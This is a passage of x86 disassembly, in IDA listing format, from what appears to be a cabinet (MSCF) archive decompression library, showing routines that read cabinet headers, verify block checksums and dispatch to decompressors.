mov [edi+10h], eax
call dword ptr [esi+28h]
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_10033B5
loc_10033A7: ; CODE XREF: sub_100331E+50�j
push ebx
push 0Bh
push dword ptr [esi]
call sub_1004350
xor eax, eax
jmp short loc_10033B8
; ---------------------------------------------------------------------------
loc_10033B5: ; CODE XREF: sub_100331E+55�j
; sub_100331E+87�j
xor eax, eax
inc eax
loc_10033B8: ; CODE XREF: sub_100331E+95�j
pop edi
pop esi
pop ebx
retn 4
sub_100331E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10033BE proc near ; CODE XREF: sub_1003F1F+2F�p
; sub_1003F1F+55�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push dword ptr [esi+0A8h]
lea ebx, [esi+7E4h]
push dword ptr [esi+48h]
push dword ptr [esi+84h]
call dword ptr [esi+10h]
add esp, 0Ch
cmp [esi+0A8h], eax
jnz loc_10034DC
mov eax, [esi+48h]
movzx eax, word ptr [eax+4]
mov ecx, [ebp+arg_4]
add eax, ecx
cmp eax, [esi+98h]
ja loc_10034DC
mov edi, [esi+48h]
movzx eax, word ptr [edi+4]
push eax
mov [ebp+arg_0], eax
mov eax, [esi+3Ch]
add eax, ecx
push eax
push dword ptr [esi+84h]
call dword ptr [esi+10h]
add esp, 0Ch
cmp [ebp+arg_0], eax
jnz loc_10034DC
xor edx, edx
cmp [edi], edx
jz short loc_1003462
mov eax, [esi+3Ch]
add eax, [ebp+arg_4]
push edx
push [ebp+arg_0]
push eax
call sub_100436B
push eax
mov eax, [esi+0A8h]
sub eax, 4
push eax
mov eax, [esi+48h]
add eax, 4
push eax
call sub_100436B
mov edi, [esi+48h]
cmp eax, [edi]
jnz short loc_10034DC
xor edx, edx
loc_1003462: ; CODE XREF: sub_10033BE+72�j
mov ecx, [ebp+arg_4]
add [edi+4], cx
cmp ecx, edx
ja short loc_100347A
mov eax, [esi+48h]
cmp [eax+6], dx
jz short loc_100347A
xor edi, edi
jmp short loc_100347D
; ---------------------------------------------------------------------------
loc_100347A: ; CODE XREF: sub_10033BE+AD�j
; sub_10033BE+B6�j
xor edi, edi
inc edi
loc_100347D: ; CODE XREF: sub_10033BE+BA�j
cmp [esi+28h], edx
jz short loc_10034D7
mov dword ptr [ebx], 2
mov eax, [esi+38h]
mov [ebx+4], eax
mov ax, [esi+0A8h]
sub ax, 8
mov [ebx+0Ch], ax
jz short loc_10034AA
mov eax, [esi+48h]
add eax, 8
mov [ebx+8], eax
jmp short loc_10034AD
; ---------------------------------------------------------------------------
loc_10034AA: ; CODE XREF: sub_10033BE+DF�j
mov [ebx+8], edx
loc_10034AD: ; CODE XREF: sub_10033BE+EA�j
mov eax, [esi+3Ch]
add eax, ecx
mov [ebx+10h], eax
mov eax, [esi+48h]
mov ax, [eax+4]
push ebx
mov [ebx+14h], ax
mov [ebx+18h], edi
mov [ebx+1Ch], cx
call dword ptr [esi+28h]
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_10034D7
push 0
push 0Bh
jmp short loc_10034E0
; ---------------------------------------------------------------------------
loc_10034D7: ; CODE XREF: sub_10033BE+C2�j
; sub_10033BE+111�j
xor eax, eax
inc eax
jmp short loc_10034E9
; ---------------------------------------------------------------------------
loc_10034DC: ; CODE XREF: sub_10033BE+2A�j
; sub_10033BE+42�j ...
push 0
push 4
loc_10034E0: ; CODE XREF: sub_10033BE+117�j
push dword ptr [esi]
call sub_1004350
xor eax, eax
loc_10034E9: ; CODE XREF: sub_10033BE+11C�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
sub_10033BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10034F0 proc near ; CODE XREF: sub_10039B0+1FA�p
; sub_10039B0+210�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
push 1
push 0
push dword ptr [esi+88h]
call dword ptr [esi+1Ch]
mov ebx, [ebp+arg_4]
mov edi, [ebp+arg_0]
push ebx
push edi
push dword ptr [esi+88h]
mov [ebp+arg_8], eax
call dword ptr [esi+10h]
add esp, 18h
test eax, eax
jle short loc_100355E
mov cl, [edi+ebx-1]
and byte ptr [edi+ebx-1], 0
mov eax, edi
lea edi, [eax+1]
loc_100352F: ; CODE XREF: sub_10034F0+44�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_100352F
sub eax, edi
lea edx, [eax+1]
cmp edx, ebx
jl short loc_1003543
test cl, cl
jnz short loc_100355E
loc_1003543: ; CODE XREF: sub_10034F0+4D�j
mov ecx, [ebp+arg_8]
push 0
lea eax, [eax+ecx+1]
push eax
push dword ptr [esi+88h]
call dword ptr [esi+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_100356D
loc_100355E: ; CODE XREF: sub_10034F0+2F�j
; sub_10034F0+51�j
push 0
push 4
push dword ptr [esi]
call sub_1004350
xor eax, eax
jmp short loc_1003570
; ---------------------------------------------------------------------------
loc_100356D: ; CODE XREF: sub_10034F0+6C�j
xor eax, eax
inc eax
loc_1003570: ; CODE XREF: sub_10034F0+7B�j
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_10034F0 endp
; =============== S U B R O U T I N E =======================================
sub_1003577 proc near ; CODE XREF: sub_1004170+7B�p
; sub_1004170+189�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push 1
push 0
push dword ptr [esi+88h]
call dword ptr [esi+1Ch]
mov ebx, eax
add esp, 0Ch
cmp ebx, 0FFFFFFFFh
jnz short loc_10035A3
push 0
push 4
push dword ptr [esi]
call sub_1004350
xor eax, eax
jmp short loc_100361B
; ---------------------------------------------------------------------------
loc_10035A3: ; CODE XREF: sub_1003577+1B�j
mov ax, [esi+0ACh]
push edi
mov [esi+7DEh], ax
mov ax, [esi+70h]
lea edi, [esi+7BCh]
mov [esi+7DAh], ax
mov eax, [esi+38h]
push edi
push 5
mov [edi], ebx
mov [esi+7CCh], eax
call dword ptr [esi+24h]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_10035EA
loc_10035DB: ; CODE XREF: sub_1003577+9E�j
push 0
push 0Bh
push dword ptr [esi]
call sub_1004350
xor eax, eax
jmp short loc_100361A
; ---------------------------------------------------------------------------
loc_10035EA: ; CODE XREF: sub_1003577+62�j
mov ax, [esi+7DEh]
test ax, ax
mov [esi+0ACh], ax
jz short loc_1003617
mov edi, [edi]
cmp edi, ebx
jz short loc_1003617
push 0
push edi
push dword ptr [esi+88h]
call dword ptr [esi+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_10035DB
loc_1003617: ; CODE XREF: sub_1003577+84�j
; sub_1003577+8A�j
xor eax, eax
inc eax
loc_100361A: ; CODE XREF: sub_1003577+71�j
pop edi
loc_100361B: ; CODE XREF: sub_1003577+2A�j
pop esi
pop ebx
retn 4
sub_1003577 endp
; =============== S U B R O U T I N E =======================================
sub_1003620 proc near ; CODE XREF: sub_1003CBC+1A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
mov al, [esi+0B2h]
push edi
xor edi, edi
and eax, 0Fh
sub eax, edi
jz short loc_1003679
dec eax
jz short loc_1003667
dec eax
jz short loc_100365D
dec eax
jz short loc_1003653
sub eax, 0Ch
jz short loc_1003687
push edi
push 6
loc_1003648: ; CODE XREF: sub_1003620+57�j
push dword ptr [esi]
call sub_1004350
xor eax, eax
jmp short loc_100368A
; ---------------------------------------------------------------------------
loc_1003653: ; CODE XREF: sub_1003620+1E�j
push dword ptr [esi+34h]
call sub_10044F6
jmp short loc_100366F
; ---------------------------------------------------------------------------
loc_100365D: ; CODE XREF: sub_1003620+1B�j
push dword ptr [esi+34h]
call nullsub_1
jmp short loc_100366F
; ---------------------------------------------------------------------------
loc_1003667: ; CODE XREF: sub_1003620+18�j
push dword ptr [esi+34h]
call nullsub_1
loc_100366F: ; CODE XREF: sub_1003620+3B�j
; sub_1003620+45�j
test eax, eax
pop ecx
jz short loc_1003679
push edi
push 7
jmp short loc_1003648
; ---------------------------------------------------------------------------
loc_1003679: ; CODE XREF: sub_1003620+15�j
; sub_1003620+52�j
push dword ptr [esi+3Ch]
call dword ptr [esi+4]
push dword ptr [esi+40h]
call dword ptr [esi+4]
pop ecx
pop ecx
loc_1003687: ; CODE XREF: sub_1003620+23�j
xor eax, eax
inc eax
loc_100368A: ; CODE XREF: sub_1003620+31�j
pop edi
pop esi
retn 4
sub_1003620 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100368F proc near ; CODE XREF: sub_1003CBC+39�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_0]
movzx ecx, word ptr [esi+0B2h]
mov eax, ecx
push edi
and eax, 0Fh
xor edi, edi
sub eax, edi
lea edx, [esi+94h]
mov dword ptr [edx], 8000h
jz loc_100374A
dec eax
jz short loc_1003729
dec eax
jz short loc_10036FF
dec eax
jz short loc_10036D3
sub eax, 0Ch
jz loc_1003846
push 6
jmp short loc_1003742
; ---------------------------------------------------------------------------
loc_10036D3: ; CODE XREF: sub_100368F+35�j
push edi
push edi
push edi
push edi
xor eax, eax
push edi
shr ecx, 8
inc eax
push edi
and ecx, 1Fh
shl eax, cl
lea ebx, [esi+98h]
push ebx
push edi
mov [ebp+var_10], eax
push edi
lea eax, [ebp+var_10]
push eax
push edx
call sub_10043CE
loc_10036FA: ; CODE XREF: sub_100368F+98�j
add esp, 2Ch
jmp short loc_100373C
; ---------------------------------------------------------------------------
loc_10036FF: ; CODE XREF: sub_100368F+32�j
mov eax, [esi+20h]
push edi
push edi
push edi
push edi
push edi
push edi
lea ebx, [esi+98h]
push ebx
push edi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+var_8]
shr ecx, 8
push eax
and ecx, 1Fh
push edx
mov [ebp+var_8], ecx
call sub_1001BED
jmp short loc_10036FA
; ---------------------------------------------------------------------------
loc_1003729: ; CODE XREF: sub_100368F+2F�j
push edi
lea ebx, [esi+98h]
push ebx
push edi
push edi
push edx
call sub_1001BED
add esp, 14h
loc_100373C: ; CODE XREF: sub_100368F+6E�j
test eax, eax
jz short loc_1003756
push 7
loc_1003742: ; CODE XREF: sub_100368F+42�j
pop eax
push edi
push eax
jmp loc_1003832
; ---------------------------------------------------------------------------
loc_100374A: ; CODE XREF: sub_100368F+28�j
lea ebx, [esi+98h]
mov dword ptr [ebx], 8000h
loc_1003756: ; CODE XREF: sub_100368F+AF�j
push dword ptr [ebx]
call dword ptr [esi+8]
cmp eax, edi
pop ecx
mov [esi+3Ch], eax
jnz short loc_100376B
loc_1003763: ; CODE XREF: sub_100368F+F4�j
push edi
push 5
jmp loc_1003832
; ---------------------------------------------------------------------------
loc_100376B: ; CODE XREF: sub_100368F+D2�j
push dword ptr [esi+94h]
call dword ptr [esi+8]
cmp eax, edi
pop ecx
mov [esi+40h], eax
jnz short loc_1003785
push dword ptr [esi+3Ch]
call dword ptr [esi+4]
pop ecx
jmp short loc_1003763
; ---------------------------------------------------------------------------
loc_1003785: ; CODE XREF: sub_100368F+EB�j
xor eax, eax
mov al, [esi+0B2h]
and eax, 0Fh
dec eax
jz short loc_10037F8
dec eax
jz short loc_10037C9
dec eax
jnz loc_1003846
push dword ptr [esi+1Ch]
lea eax, [esi+34h]
push dword ptr [esi+18h]
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push eax
push ebx
push dword ptr [esi+4]
lea eax, [ebp+var_10]
push dword ptr [esi+8]
push eax
lea eax, [esi+94h]
push eax
call sub_10043CE
jmp short loc_10037F3
; ---------------------------------------------------------------------------
loc_10037C9: ; CODE XREF: sub_100368F+105�j
push dword ptr [esi+1Ch]
lea eax, [esi+34h]
push dword ptr [esi+18h]
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push eax
push ebx
push dword ptr [esi+4]
lea eax, [ebp+var_8]
push dword ptr [esi+8]
push eax
lea eax, [esi+94h]
push eax
call sub_1001BED
loc_10037F3: ; CODE XREF: sub_100368F+138�j
add esp, 2Ch
jmp short loc_1003812
; ---------------------------------------------------------------------------
loc_10037F8: ; CODE XREF: sub_100368F+102�j
lea eax, [esi+34h]
push eax
push ebx
push dword ptr [esi+4]
lea eax, [esi+94h]
push dword ptr [esi+8]
push eax
call sub_1001BED
add esp, 14h
loc_1003812: ; CODE XREF: sub_100368F+167�j
cmp eax, edi
jz short loc_1003846
push dword ptr [esi+3Ch]
xor ebx, ebx
cmp eax, 1
setnz bl
lea ebx, [ebx+ebx+5]
call dword ptr [esi+4]
push dword ptr [esi+40h]
call dword ptr [esi+4]
pop ecx
pop ecx
push edi
push ebx
loc_1003832: ; CODE XREF: sub_100368F+B6�j
; sub_100368F+D7�j
push dword ptr [esi]
call sub_1004350
mov word ptr [esi+0B2h], 0Fh
xor eax, eax
jmp short loc_1003849
; ---------------------------------------------------------------------------
loc_1003846: ; CODE XREF: sub_100368F+3A�j
; sub_100368F+108�j ...
xor eax, eax
inc eax
loc_1003849: ; CODE XREF: sub_100368F+1B5�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_100368F endp
; =============== S U B R O U T I N E =======================================
sub_1003850 proc near ; CODE XREF: sub_1003FC0+33�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
mov al, [esi+0B2h]
push edi
xor edi, edi
and eax, 0Fh
sub eax, edi
jz short loc_10038A9
dec eax
jz short loc_1003897
dec eax
jz short loc_100388D
dec eax
jz short loc_1003883
sub eax, 0Ch
jz short loc_10038A9
push edi
push 6
loc_1003878: ; CODE XREF: sub_1003850+57�j
push dword ptr [esi]
call sub_1004350
xor eax, eax
jmp short loc_10038AC
; ---------------------------------------------------------------------------
loc_1003883: ; CODE XREF: sub_1003850+1E�j
push dword ptr [esi+34h]
call sub_10044DB
jmp short loc_100389F
; ---------------------------------------------------------------------------
loc_100388D: ; CODE XREF: sub_1003850+1B�j
push dword ptr [esi+34h]
call nullsub_1
jmp short loc_100389F
; ---------------------------------------------------------------------------
loc_1003897: ; CODE XREF: sub_1003850+18�j
push dword ptr [esi+34h]
call nullsub_1
loc_100389F: ; CODE XREF: sub_1003850+3B�j
; sub_1003850+45�j
test eax, eax
pop ecx
jz short loc_10038A9
push edi
push 7
jmp short loc_1003878
; ---------------------------------------------------------------------------
loc_10038A9: ; CODE XREF: sub_1003850+15�j
; sub_1003850+23�j ...
xor eax, eax
inc eax
loc_10038AC: ; CODE XREF: sub_1003850+31�j
pop edi
pop esi
retn 4
sub_1003850 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10038B1 proc near ; CODE XREF: sub_1003F1F+74�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor eax, eax
mov al, [edi+0B2h]
xor ebx, ebx
and eax, 0Fh
sub eax, ebx
jz loc_1003982
dec eax
jz short loc_1003944
dec eax
jz short loc_100391F
dec eax
jz short loc_10038E9
push ebx
push 6
loc_10038DB: ; CODE XREF: sub_10038B1+C0�j
push dword ptr [edi]
call sub_1004350
xor eax, eax
jmp loc_10039A9
; ---------------------------------------------------------------------------
loc_10038E9: ; CODE XREF: sub_10038B1+25�j
mov esi, [ebp+arg_4]
movzx eax, word ptr [esi]
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
mov eax, [edi+48h]
push dword ptr [edi+40h]
movzx eax, word ptr [eax+4]
push eax
push dword ptr [edi+3Ch]
push dword ptr [edi+34h]
call sub_100448D
loc_100390C: ; CODE XREF: sub_10038B1+91�j
add esp, 14h
test eax, eax
jnz short loc_100396E
mov ax, word ptr [ebp+arg_0]
mov [esi], ax
jmp loc_10039A6
; ---------------------------------------------------------------------------
loc_100391F: ; CODE XREF: sub_10038B1+22�j
mov esi, [ebp+arg_4]
movzx eax, word ptr [esi]
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
mov eax, [edi+48h]
push dword ptr [edi+40h]
movzx eax, word ptr [eax+4]
push eax
push dword ptr [edi+3Ch]
push dword ptr [edi+34h]
call nullsub_1
jmp short loc_100390C
; ---------------------------------------------------------------------------
loc_1003944: ; CODE XREF: sub_10038B1+1F�j
mov eax, [edi+94h]
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
mov eax, [edi+48h]
push dword ptr [edi+40h]
movzx eax, word ptr [eax+4]
push eax
push dword ptr [edi+3Ch]
push dword ptr [edi+34h]
call nullsub_1
add esp, 14h
test eax, eax
jz short loc_1003976
loc_100396E: ; CODE XREF: sub_10038B1+60�j
push ebx
push 7
jmp loc_10038DB
; ---------------------------------------------------------------------------
loc_1003976: ; CODE XREF: sub_10038B1+BB�j
mov eax, [ebp+arg_4]
mov cx, word ptr [ebp+arg_0]
mov [eax], cx
jmp short loc_10039A6
; ---------------------------------------------------------------------------
loc_1003982: ; CODE XREF: sub_10038B1+18�j
mov eax, [edi+48h]
mov ax, [eax+4]
mov ecx, [ebp+arg_4]
mov [ecx], ax
mov esi, [edi+3Ch]
mov edi, [edi+40h]
movzx ecx, ax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_10039A6: ; CODE XREF: sub_10038B1+69�j
; sub_10038B1+CF�j
xor eax, eax
inc eax
loc_10039A9: ; CODE XREF: sub_10038B1+33�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
sub_10038B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10039B0 proc near ; CODE XREF: sub_1003DF4+A1�p
; sub_1004170+4F�p
var_24 = dword ptr -24h
var_C = word ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = word ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
push esi
lea eax, [ebx+5B9h]
lea edx, [ebx+6BAh]
push edi
sub edx, eax
loc_10039CA: ; CODE XREF: sub_10039B0+22�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_10039CA
mov eax, [ebp+arg_4]
mov esi, eax
loc_10039D9: ; CODE XREF: sub_10039B0+2E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_10039D9
lea edi, [ebx+6BAh]
sub eax, esi
dec edi
loc_10039E9: ; CODE XREF: sub_10039B0+3F�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_10039E9
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, 180h
push edi
mov esi, 8000h
lea eax, [ebx+6BAh]
push esi
push eax
call dword ptr [ebx+0Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+88h], eax
jz loc_1003C60
push edi
lea eax, [ebx+6BAh]
push esi
push eax
call dword ptr [ebx+0Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+84h], eax
jz loc_1003C60
push 24h
lea eax, [ebp+var_24]
push eax
push dword ptr [ebx+88h]
call dword ptr [ebx+10h]
add esp, 0Ch
cmp eax, 24h
jz short loc_1003A63
loc_1003A5C: ; CODE XREF: sub_10039B0+BA�j
push 0
jmp loc_1003B31
; ---------------------------------------------------------------------------
loc_1003A63: ; CODE XREF: sub_10039B0+AA�j
cmp [ebp+var_24], 4643534Dh
jnz short loc_1003A5C
cmp [ebp+var_C], 103h
jz short loc_1003A80
movzx eax, [ebp+var_C]
push eax
push 3
jmp loc_1003C64
; ---------------------------------------------------------------------------
loc_1003A80: ; CODE XREF: sub_10039B0+C2�j
mov ax, [ebp+arg_C]
cmp ax, 0FFFFh
jz short loc_1003AA3
mov cx, [ebp+arg_8]
cmp cx, [ebp+var_4]
jnz short loc_1003A9A
cmp ax, [ebp+var_2]
jz short loc_1003AA3
loc_1003A9A: ; CODE XREF: sub_10039B0+E2�j
push 0
push 0Ah
jmp loc_1003C64
; ---------------------------------------------------------------------------
loc_1003AA3: ; CODE XREF: sub_10039B0+D8�j
; sub_10039B0+E8�j
and byte ptr [ebp+arg_0+2], 0
and byte ptr [ebp+arg_0+3], 0
push 9
lea edi, [ebx+50h]
pop ecx
lea esi, [ebp+var_24]
rep movsd
xor edi, edi
test byte ptr [ebx+6Eh], 4
mov word ptr [ebp+arg_0], di
jz short loc_1003AD9
push 4
lea eax, [ebp+arg_0]
push eax
push dword ptr [ebx+88h]
call dword ptr [ebx+10h]
add esp, 0Ch
cmp eax, 4
jnz short loc_1003B30
loc_1003AD9: ; CODE XREF: sub_10039B0+110�j
movzx eax, word ptr [ebp+arg_0]
cmp [ebx+0A0h], eax
jz short loc_1003B0E
mov eax, [ebx+4Ch]
cmp eax, edi
jz short loc_1003AF4
push eax
call dword ptr [ebx+4]
pop ecx
mov [ebx+4Ch], edi
loc_1003AF4: ; CODE XREF: sub_10039B0+13A�j
movzx eax, word ptr [ebp+arg_0]
cmp eax, edi
mov [ebx+0A0h], eax
jbe short loc_1003B0E
push eax
call dword ptr [ebx+8]
cmp eax, edi
pop ecx
mov [ebx+4Ch], eax
jz short loc_1003B7E
loc_1003B0E: ; CODE XREF: sub_10039B0+133�j
; sub_10039B0+150�j
mov eax, [ebx+0A0h]
cmp eax, edi
jbe short loc_1003B38
push eax
push dword ptr [ebx+4Ch]
push dword ptr [ebx+88h]
call dword ptr [ebx+10h]
add esp, 0Ch
cmp [ebx+0A0h], eax
jz short loc_1003B38
loc_1003B30: ; CODE XREF: sub_10039B0+127�j
push edi
loc_1003B31: ; CODE XREF: sub_10039B0+AE�j
push 2
jmp loc_1003C64
; ---------------------------------------------------------------------------
loc_1003B38: ; CODE XREF: sub_10039B0+166�j
; sub_10039B0+17E�j
movzx eax, byte ptr [ebp+arg_0+2]
add eax, 8
cmp [ebx+44h], edi
jnz short loc_1003B58
push eax
mov [ebx+0A4h], eax
call dword ptr [ebx+8]
cmp eax, edi
pop ecx
mov [ebx+44h], eax
jnz short loc_1003B60
jmp short loc_1003B7E
; ---------------------------------------------------------------------------
loc_1003B58: ; CODE XREF: sub_10039B0+192�j
cmp eax, [ebx+0A4h]
jnz short loc_1003B8E
loc_1003B60: ; CODE XREF: sub_10039B0+1A4�j
movzx eax, byte ptr [ebp+arg_0+3]
add eax, 8
cmp [ebx+48h], edi
jnz short loc_1003B86
push eax
mov [ebx+0A8h], eax
call dword ptr [ebx+8]
cmp eax, edi
pop ecx
mov [ebx+48h], eax
jnz short loc_1003B96
loc_1003B7E: ; CODE XREF: sub_10039B0+15C�j
; sub_10039B0+1A6�j
push edi
push 5
jmp loc_1003C64
; ---------------------------------------------------------------------------
loc_1003B86: ; CODE XREF: sub_10039B0+1BA�j
cmp eax, [ebx+0A8h]
jz short loc_1003B96
loc_1003B8E: ; CODE XREF: sub_10039B0+1AE�j
push edi
push 9
jmp loc_1003C64
; ---------------------------------------------------------------------------
loc_1003B96: ; CODE XREF: sub_10039B0+1CC�j
; sub_10039B0+1DC�j
test byte ptr [ebx+6Eh], 1
mov esi, 100h
jz short loc_1003BCE
push ebx
push esi
lea eax, [ebx+1B5h]
push eax
call sub_10034F0
test eax, eax
jz loc_1003C6B
push ebx
push esi
lea eax, [ebx+2B6h]
push eax
call sub_10034F0
test eax, eax
jnz short loc_1003BDC
jmp loc_1003C6B
; ---------------------------------------------------------------------------
loc_1003BCE: ; CODE XREF: sub_10039B0+1EF�j
and byte ptr [ebx+1B5h], 0
and byte ptr [ebx+2B6h], 0
loc_1003BDC: ; CODE XREF: sub_10039B0+217�j
test byte ptr [ebx+6Eh], 2
jz short loc_1003C08
push ebx
push esi
lea eax, [ebx+3B7h]
push eax
call sub_10034F0
test eax, eax
jz short loc_1003C6B
push ebx
push esi
lea eax, [ebx+4B8h]
push eax
call sub_10034F0
test eax, eax
jnz short loc_1003C16
jmp short loc_1003C6B
; ---------------------------------------------------------------------------
loc_1003C08: ; CODE XREF: sub_10039B0+230�j
and byte ptr [ebx+3B7h], 0
and byte ptr [ebx+4B8h], 0
loc_1003C16: ; CODE XREF: sub_10039B0+254�j
push 1
push edi
push dword ptr [ebx+88h]
call dword ptr [ebx+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+2Ch], eax
push edi
jz short loc_1003C43
push dword ptr [ebx+60h]
push dword ptr [ebx+88h]
call dword ptr [ebx+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_1003C47
push edi
loc_1003C43: ; CODE XREF: sub_10039B0+27C�j
push 4
jmp short loc_1003C64
; ---------------------------------------------------------------------------
loc_1003C47: ; CODE XREF: sub_10039B0+290�j
mov ax, [ebx+6Ch]
push ebx
mov [ebx+0ACh], ax
call sub_100331E
neg eax
sbb eax, eax
neg eax
jmp short loc_1003C6D
; ---------------------------------------------------------------------------
loc_1003C60: ; CODE XREF: sub_10039B0+71�j
; sub_10039B0+8F�j
push 0
push 1
loc_1003C64: ; CODE XREF: sub_10039B0+CB�j
; sub_10039B0+EE�j ...
push dword ptr [ebx]
call sub_1004350
loc_1003C6B: ; CODE XREF: sub_10039B0+201�j
; sub_10039B0+219�j ...
xor eax, eax
loc_1003C6D: ; CODE XREF: sub_10039B0+2AE�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_10039B0 endp
; =============== S U B R O U T I N E =======================================
sub_1003C74 proc near ; CODE XREF: sub_1003DF4+108�p
; sub_1004170+97�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 10h
lea eax, [esi+74h]
push eax
push dword ptr [esi+88h]
call dword ptr [esi+10h]
add esp, 0Ch
cmp eax, 10h
jnz short loc_1003CAB
push esi
push 100h
lea eax, [esi+0B4h]
push eax
call sub_10034F0
test eax, eax
jz short loc_1003CAB
xor eax, eax
inc eax
jmp short loc_1003CB8
; ---------------------------------------------------------------------------
loc_1003CAB: ; CODE XREF: sub_1003C74+1A�j
; sub_1003C74+30�j
push 0
push 4
push dword ptr [esi]
call sub_1004350
xor eax, eax
loc_1003CB8: ; CODE XREF: sub_1003C74+35�j
pop esi
retn 4
sub_1003C74 endp
; =============== S U B R O U T I N E =======================================
sub_1003CBC proc near ; CODE XREF: sub_1003D05+88�p
arg_0 = word ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
mov di, [esp+8+arg_0]
cmp di, [esi+0B2h]
jnz short loc_1003CD5
xor eax, eax
inc eax
jmp short loc_1003D00
; ---------------------------------------------------------------------------
loc_1003CD5: ; CODE XREF: sub_1003CBC+12�j
push esi
call sub_1003620
test eax, eax
jnz short loc_1003CED
push eax
push 7
push dword ptr [esi]
call sub_1004350
xor eax, eax
jmp short loc_1003D00
; ---------------------------------------------------------------------------
loc_1003CED: ; CODE XREF: sub_1003CBC+21�j
push esi
mov [esi+0B2h], di
call sub_100368F
neg eax
sbb eax, eax
neg eax
loc_1003D00: ; CODE XREF: sub_1003CBC+17�j
; sub_1003CBC+2F�j
pop edi
pop esi
retn 8
sub_1003CBC endp
; =============== S U B R O U T I N E =======================================
sub_1003D05 proc near ; CODE XREF: sub_1003DF4+AD�p
; sub_1003FC0+3E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0A4h]
imul eax, ebx
add eax, [esi+2Ch]
push edi
push 0
push eax
push dword ptr [esi+84h]
lea edi, [esi+7E4h]
mov [esi+90h], ebx
call dword ptr [esi+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_1003DE1
push dword ptr [esi+0A4h]
push dword ptr [esi+44h]
push dword ptr [esi+84h]
call dword ptr [esi+10h]
add esp, 0Ch
cmp [esi+0A4h], eax
jnz loc_1003DE1
mov eax, [esi+44h]
push 0
push dword ptr [eax]
push dword ptr [esi+84h]
call dword ptr [esi+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_1003DE1
mov eax, [esi+44h]
mov cx, [eax+4]
mov [esi+0B0h], cx
movzx eax, word ptr [eax+6]
push esi
push eax
call sub_1003CBC
test eax, eax
jz short loc_1003DEC
cmp dword ptr [esi+28h], 0
jz short loc_1003DDC
mov dword ptr [edi], 1
mov eax, [esi+38h]
mov [edi+4], eax
mov ax, [esi+0A4h]
sub ax, 8
mov [edi+0Ch], ax
jz short loc_1003DC4
mov eax, [esi+44h]
add eax, 8
mov [edi+8], eax
jmp short loc_1003DC8
; ---------------------------------------------------------------------------
loc_1003DC4: ; CODE XREF: sub_1003D05+B2�j
and dword ptr [edi+8], 0
loc_1003DC8: ; CODE XREF: sub_1003D05+BD�j
push edi
mov [edi+0Eh], bx
call dword ptr [esi+28h]
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_1003DDC
push 0
push 0Bh
jmp short loc_1003DE5
; ---------------------------------------------------------------------------
loc_1003DDC: ; CODE XREF: sub_1003D05+95�j
; sub_1003D05+CF�j
xor eax, eax
inc eax
jmp short loc_1003DEE
; ---------------------------------------------------------------------------
loc_1003DE1: ; CODE XREF: sub_1003D05+35�j
; sub_1003D05+56�j ...
push 0
push 4
loc_1003DE5: ; CODE XREF: sub_1003D05+D5�j
push dword ptr [esi]
call sub_1004350
